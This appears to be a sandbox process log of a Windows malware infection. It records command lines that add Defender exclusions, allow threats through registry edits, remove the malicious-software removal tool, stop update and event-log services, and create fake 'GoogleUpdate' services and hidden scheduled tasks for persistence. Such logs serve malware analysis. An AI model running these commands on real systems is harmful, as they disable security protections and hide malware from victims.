"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"

C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe

"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"

C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe

"C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe"

C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe

"C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe" /s

C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe

"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe

"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {3A9B6C6B-CA9B-4DC5-A930-AB37A5188810} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe

"C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe"

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\7zS20CA.tmp\Install.exe

.\Install.exe /tEdidDDf "385118" /S

C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe

"C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe

"C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Users\Admin\AppData\Local\Temp\7zS3830.tmp\Install.exe

.\Install.exe /tEdidDDf "385118" /S

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\qEyOWBL.exe\" it /CMsdidNczE 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe\" it /PdldidFsHw 385118 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\9C20.bat" "

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

C:\Windows\system32\taskeng.exe

taskeng.exe {A0C7BAAC-E03D-419F-BDCD-85EABDCF3FBD} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\C1BA.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240514010344.log C:\Windows\Logs\CBS\CbsPersist_20240514010344.cab

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RYxniJw.exe it /PdldidFsHw 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe

"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe

"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"

C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe

"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe

"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WSNKISKT"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBaxREWWY" /SC once /ST 00:14:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

